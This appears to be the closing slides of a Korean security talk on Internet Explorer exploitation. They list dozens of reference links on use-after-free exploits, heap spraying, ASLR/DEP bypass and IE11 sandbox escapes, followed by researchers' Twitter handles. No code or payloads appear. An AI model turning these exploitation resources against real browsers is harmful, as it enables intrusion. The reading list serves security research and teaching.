• https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf
Bypass Sandbox
No, Just Back to the Basic!
“해커가 되려면 트렌드만 쫓지 말고기본에 충실해야 합니다.”
Reference (URL)1. [exploit technique]2. http://www.garage4hackers.com/content.php?r=143-Beginners-Guide-to-Use-after-free-Exploits-IE-6-0-day-Exploit-Development3. https://labs.mwrinfosecurity.com/system/assets/538/original/mwri_polishing-chrome-slides-nsc_2013-09-06.pdf4. https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/5. http://fuzzysecurity.com/tutorials/expDev/11.html6. http://packetstormsecurity.com/files/116320/Internet-Explorer-Script-Interjection-Code-Execution.html7. http://ifsec.blogspot.kr/2013/11/exploiting-internet-explorer-11-64-bit.html8. https://code.google.com/p/chromium/issues/detail?id=352369&can=1&q=vupen&colspec=ID%20Pri%20M%20Iteration%20ReleaseBlock%20Cr%20Status%20O
wner%20Summary%20OS%20Modified9. http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf10. https://cansecwest.com/slides/2014/ROPs_are_for_the_99_CanSecWest_2014.pdf11. http://blog.fortinet.com/Advanced-Exploit-Techniques-Attacking-the-IE-Script-Engine/12. https://www.blackhat.com/us-14/archives.html#svg-exploiting-browsers-without-image-parsing-bugs13. http://www.secniu.com/the-art-of-leaks-the-return-of-heap-feng-shuidemo-code/14. http://blog.exodusintel.com/2013/11/26/browser-weakest-byte/15. https://github.com/rapid7/metasploit-framework/blob/master/test/modules/exploits/test/explib2_ie11_exec_test_case.rb16. https://community.rapid7.com/community/metasploit/blog/2014/04/07/hack-away-at-the-unessential-with-explib2-in-metasploit17. http://www.secniu.com/how-to-use-vbscript-to-turn-on-the-god-mode/18. http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b19. [CVE Analysis]20. http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day_en/21. http://www.exploit-db.com/wp-content/themes/exploit/docs/20084.pdf22. http://www.exploit-db.com/wp-content/themes/exploit/docs/21832.pdf23. http://pgnsc.tistory.com/34824. http://training.nshc.net/KOR/Document/vuln/20130405_Microsoft_Internet_Explorer_CButton%20Object_Use_After_Free_Vulnerability.pdf25. http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-
attacks.html26. http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Microsoft-IE-zero-day-and-recent-exploitation-trends-CVE-2014/ba-p/646182027. http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/The-mechanism-behind-Internet-Explorer-CVE-2014-1776-exploits/ba-p/647622028. http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Double-Dip-Using-the-latest-IE-0-day-to-get-RCE-and-an-ASLR/ba-p/646628029. http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html30. http://hdwsec.fr/blog/CVE-2014-0322.html31. [Mitigation]32. http://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller_Exploit_Mitigation_Slides.pdf33. http://blog.trendmicro.com/trendlabs-security-intelligence/isolated-heap-for-internet-explorer-helps-mitigate-uaf-exploits/34. https://labs.mwrinfosecurity.com/blog/2014/06/20/isolated-heap-friends---object-allocation-hardening-in-web-browsers/35. http://researchcenter.paloaltonetworks.com/2014/07/beginning-end-use-free-exploitation/#more-615836. http://www.contextis.com/blog/windows-mitigaton-bypass/37. [Bypass Sandbox]38. http://monsterz.kr/wp-content/uploads/2014/08/Newbies-Travels-To-Sandbox.pdf39. https://github.com/tyranid/IE11SandboxEscapes40. http://www.contextis.com/documents/79/IE_Sandbox_Escapes_Presentation.pdf41. http://conference.hitb.org/hitbsecconf2013kul/materials/D2T1%20-%20Mark%20Vincent%20Yason%20-
%20Diving%20Into%20IE10's%20Enhanced%20Protected%20Mode%20Sandbox.pdf42. http://neilscomputerblog.blogspot.kr/2014/04/vtguard.html43. http://hacksum.net/?p=2030
Reference (twitter)@WTFuzz@lcamtuf@tiraniddo@tombkeeper@ifsecure@kingcope@tentacolo_Viola@stephenfewer@trimosx@HaifeiLi@tiraniddo@defendtheworld@j00ru@corelanc0d3r@_sinn3r
@sickness416@Ivanlef0u@alexsotirov@VUPEN@mwrlabs@SophosLabs@CTXIS@44CON@CanSecWest@SyScan@deepsec@phdays@Pwn2Own_Contest...
Q & A
어휴,말을 어떻게 꺼내야 할지..
THANK YOU